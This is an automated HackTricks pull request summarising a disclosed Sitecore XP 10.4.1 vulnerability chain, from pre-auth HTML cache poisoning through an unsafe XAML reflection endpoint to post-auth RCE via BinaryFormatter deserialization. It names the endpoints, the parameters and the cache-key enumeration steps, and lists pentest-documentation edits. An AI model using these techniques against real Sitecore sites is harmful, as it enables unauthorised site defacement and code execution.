Cache Me If You Can Sitecore Experience Platform Cache Poiso...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/
• Blog Title: Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE
• Suggested Section: Pentesting Web -> Web Cache Poisoning (with cross-reference to .NET Deserialization/BinaryFormatter) or a new CMS subpage: Pentesting CMS -> Sitecore

🎯 Content Summary

Sitecore XP 10.4.1 Vulnerability Chain: Pre-auth HTML Cache Poisoning to Post-auth RCE

Target and Timeline

Target: Sitecore Experience Platform (XP) 10.4.1 rev. 011628. Research discloses three issues that chain from pre-auth HTML cache poisoning to post-auth RCE. Patches were released in June/July 2025 (KB1003667, KB1003734).

Vulnerabilities

• WT-2025-0023 / CVE-2025-53693: Pre-auth HTML cache poisoning via uns...

  🔧 Technical Details

  Pre-auth cache poisoning via XAML reflection: Use /-/xaml/Sitecore.Shell.Xaml.WebControl where AjaxScriptManager accepts __SOURCE (clientID of xmlcontrol:GlobalHeader) and __PARAMETERS (e.g., AddToCache("key","<html>...</html>")). Because XmlControl extends Sitecore.Web.UI.WebControl, ReflectionUtil.Filter allows invoking WebControl.AddToCache, granting arbitrary HTML cache writes without auth.

  Enumerating cache keys: If /sitecore/api/ssc (ItemService) is exposed, query /item/search to list cacheable items, their VaryBy* flags, and item paths. Enumerate device names via _templatename:Device. Construct exact keys: {Path}_#lang:{LANG}[_#dev:{DEVICE}][_#login:{T|F}]...[_#index] and poison precisely.

  Side-channel enumeration under...

  🤖 Agent Actions

  Actions taken:

  1. Explored the repository to find the best fit for the content:
  • Web cache poisoning material belongs under Pentesting Web -> cache-deception.
  • The deserialization sink belongs under Pentesting Web -> Deserialization (.NET).
  • Sitecore is a distinct CMS/tech with existing precedents (Drupal/Joomla/etc.) under network-services-pentesting/pentesting-web, so a new Sitecore page was created and linked from the main “Pentesting Web Methodology” page.
  2. Created a new dedicated Sitecore page capturing the full chain and techniques:
  • File created: src/network-services-pentesting/pentesting-web/sitecore/README.md
  • Content included:
    • Pre-auth HTML cache poisoning primitive via XAML AjaxScriptManager reflection calling Sitecore.Web.UI.WebControl.AddToCache(cacheKey, html)
    • PoC request using __SOURCE and __PARAMETERS and where to aim (xmlcontrol:GlobalHeader clientID)
    • Cache key construction with VaryBy* fields and an example key to target precisely
    • Enumerating cacheable items and device names using /sitecore/api/ssc/item/search and the side-channel via TotalCount under restricted users
    • Post-auth RCE via convertToRuntimeHtml → ConvertWebControls → Sitecore.Convert.Base64ToObject (BinaryFormatter.Deserialize)
    • End-to-end trigger steps via EditHtml → FixHtml dialog with the required HTML layout (iframe id + sibling id “_inner” with base64 gadget)
    • Detection and hardening checklist
    • References (watchTowr blog and Sitecore KBs)
  • Cross-references:
    • Linked to generic cache poisoning content
    • Linked to Deserialization overview and the .NET page
  3. Linked Sitecore in the main web tech tricks list:
  • Modified: src/network-services-pentesting/pentesting-web/README.md
  • Added bullet entry: Sitecore (sitecore/index.html) in “Web tech tricks”
  4. Augmented the generic Web Cache Poisoning page with the Sitecore-specific technique and link:
  • Modified: src/pentesting-web/cache-deception/README.md
  • Added a concise “Sitecore pre-auth HTML cache poisoning (unsafe XAML Ajax reflection)” subsection:
    • Included minimal PoC and an explanation that it enables arbitrary HtmlCache writes
    • Pointed to the full Sitecore page via {{#ref}}
    • Added watchTowr blog link into the References section for added context
  5. Added a real-world .NET sink section for Sitecore BinaryFormatter usage:
  • Modified: src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
  • New section: “Real‑world sink: Sitecore convertToRuntimeHtml → BinaryFormatter”
    • Summarized the sink API and pipeline path (convertToRuntimeHtml → ConvertWebControls → Base64ToObject)
    • Minimal authenticated trigger flow (EditHtml → FixHtml with iframe/sibling id convention)
    • Reference to the dedicated Sitecore page for full chain
    • Added watchTowr blog link in this page’s References

  Files changed/created:

  • Created: src/network-services-pentesting/pentesting-web/sitecore/README.md
  • Modified: src/network-services-pentesting/pentesting-web/README.md (added Sitecore entry)
  • Modified: src/pentesting-web/cache-deception/README.md (added Sitecore technique subsection, and reference)
  • Modified: src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md (added Sitecore sink, and reference)

  Why this placement:

  • The Sitecore chain contains a product-specific pre-auth cache poisoning primitive, API enumeration patterns, and a product-specific BinaryFormatter sink. A dedicated Sitecore page under network-services-pentesting/pentesting-web matches existing CMS/tech organization and avoids bloating generic pages.
  • Generic cache-poisoning page received a short, self-contained “real-world” reference and PoC (minimal duplication) plus a link to the Sitecore detail page.
  • .NET deserialization page gained a concise “real-world” sink example pointing to the detailed Sitecore chain, improving practical applicability of the .NET material.

  References added:

  • watchTowr Labs – Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE
  • Sitecore KB1003667, KB1003734

  Notes:

  • All internal references via {{#ref}} use verified relative paths.
  • Maintained HackTricks style (banners, structure, code blocks, concise technical language).
  • No unrelated sections were created; Sitecore is discoverable from the main pentesting web methodology list and cross-linked from relevant generic technique pages.

  ---

  This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

  🗑️ File Cleanup

  • searchindex.js removed: This auto-generated file has been removed to prevent conflicts.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> Web Cache Poisoning (with cross-reference to .NET Deserialization/BinaryFormatter) or a new CMS subpage: Pentesting CMS -> Sitecore".

Repository Maintenance:

• MD Files Formatting: 879 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0